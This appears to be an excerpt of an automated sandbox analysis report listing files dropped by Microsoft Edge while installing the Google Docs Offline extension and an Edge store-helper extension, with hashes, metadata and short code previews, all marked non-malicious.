                                                                                                                                                                                                                                                                                                                                                        Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):854
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                                                                        MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                                                                        SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                                                                        SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                                                                        SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2525
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.417781191647272
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1H9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APHgiVb
                                                                                                                                                                                                                                                                                                                                                        MD5:35068E2550395A8A3E74558F2F4658DA
                                                                                                                                                                                                                                                                                                                                                        SHA1:BD6620054059BFB7A27A4FFF86B9966727F2C2B9
                                                                                                                                                                                                                                                                                                                                                        SHA-256:E2F418C816895E830541F48C0406B9398805E88B61A4EC816244154CD793743C
                                                                                                                                                                                                                                                                                                                                                        SHA-512:4BCB971D7353648ABF25ACA7A4A4771F62BBB76F8FC13BDE886F29826D9314F5101942492004FC719493604D317958B63A95CF5173F8180214F27D6BEA303F97
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):97
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                                                                        MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                                                                        SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                                                                        SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                                                                        SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3700)
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):95606
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.405749379350638
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:rFTnpa+88KmEfryTdXPVy0d8RZZ0Qk4CWbsnf29Gmyj9tIRRduRnCrl:almPXPVCFCWbsnDVQRwF0l
                                                                                                                                                                                                                                                                                                                                                        MD5:9D0EF4F7CB0306DCB7A7CDCD6DC2CCC7
                                                                                                                                                                                                                                                                                                                                                        SHA1:88D7F0A88C5807BFE00F13B612CC0522EEBE514A
                                                                                                                                                                                                                                                                                                                                                        SHA-256:E5E4392B21A21ECAFD27707BF70F95961B2656735A20B40BA54479D40EAB063C
                                                                                                                                                                                                                                                                                                                                                        SHA-512:34CD9AF9199DE606A531E98DB82BEAA5552E59BCCB2AB2BF49F82D6FA05425EB6936BC5F03BFC421AB6980B91395D9FDC5F0776882E1D49B3217CD35641FF906
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):291
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                                                                        MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                                                                        SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                                                                        SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3705)
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):104595
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.385879258644142
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:CvBfoqPByzpq7Wj3X5GtH2n4JvHDxwKMpFs0vuFfkR/2oTnHu96Iny0Kj2ThzfS:BlXQtoZrs0vskDTHu9rhTS
                                                                                                                                                                                                                                                                                                                                                        MD5:4E0C47897BF98DEAC56F800942E150C4
                                                                                                                                                                                                                                                                                                                                                        SHA1:7903D30E0ACEE273724BDAA67446D9FD4E8460A5
                                                                                                                                                                                                                                                                                                                                                        SHA-256:FE76EA0C2F81E6140F38F4143B40BE85014B93FF80737600CFB39AEB5C8C6537
                                                                                                                                                                                                                                                                                                                                                        SHA-512:8B31463FC683439BAB5D4AEFE2BE0F6A9F5B695C2D95AFF3F842BFC74B10AE3D386D288121161506F74A08FB86D25C1096DA4177B768254BF84E83983982640F
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:'use strict';function aa(){return function(){}}function k(a){return function(){return this[a]}}function ba(a){return function(){return a}}var n;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=ea(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");retu

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\cceb290d-fd5b-4241-b663-ed317efb5782.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):135771
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.802585890890899
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3072:LtlntxI0jRnnf4pTz8IayMaCRABlauflM+u0F/oWRW:pl4+hf4pTky1EABYufNFS4W
                                                                                                                                                                                                                                                                                                                                                        MD5:DA75BB05D10ACC967EECAAC040D3D733
                                                                                                                                                                                                                                                                                                                                                        SHA1:95C08E067DF713AF8992DB113F7E9AEC84F17181
                                                                                                                                                                                                                                                                                                                                                        SHA-256:33AE9B8F06DC777BB1A65A6BA6C3F2A01B25CD1AFC291426B46D1DF27EA6E7E2
                                                                                                                                                                                                                                                                                                                                                        SHA-512:56533DE53872F023809A20D1EA8532CDC2260D40B05C5A7012C8E61576FF092F006A197F759C92C6B8C429EEEC4BB542073B491DDCFD5B22CD4ECBE1A8A7C6EF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[...........=.B.../EYp....i:........ua....w...\H.j....b....4...l.b.:u.%1z....}L.A.F.IZ.2^.j...!F.&@;L..z...02..`:J_@....m....qcQ.|sD.r`vC.#.8lm...R.8.~A...."~)".[.M...o.a.H.$..(.d/.K.6......c........#.$..>.#..3..-...n4J.$-....N...s.G...3..q.e..(.B?*."...9M......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!..w./B..$<......r-.'..xp.H..Q...8.!..R^...%..W0....q....g.D..~.".%............mo.:......<#a..e...Chp...x4z....!.!.a...qgo....p8.T.6...Z....?..CV...<..K...?....k..........q=....Y^........!..K...G...m.n..Y.Y.......u.Wf...TO".?.......U/Rd..Y....j....H..Q...{.....x.OQ.~+}...L.9_.:.,E.....q.0&...I;b..H...>...9.}.B

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_976469688\32a53432-937a-4c06-88cf-0daa7d8671f7.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):11185
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                                                        MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                                                        SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                                                        SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                                                        SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_976469688\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1753
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                                                                        MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                                                                        SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                                                                        SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                                                                        SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_976469688\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):9815
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                                                                        MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                                                                        SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                                                                        SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                                                                        SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_976469688\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):10388
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                                                                        MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                                                                        SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                                                                        SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                                                                        SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_976469688\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):962
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                                                                        MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                                                                        SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                                                                        SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
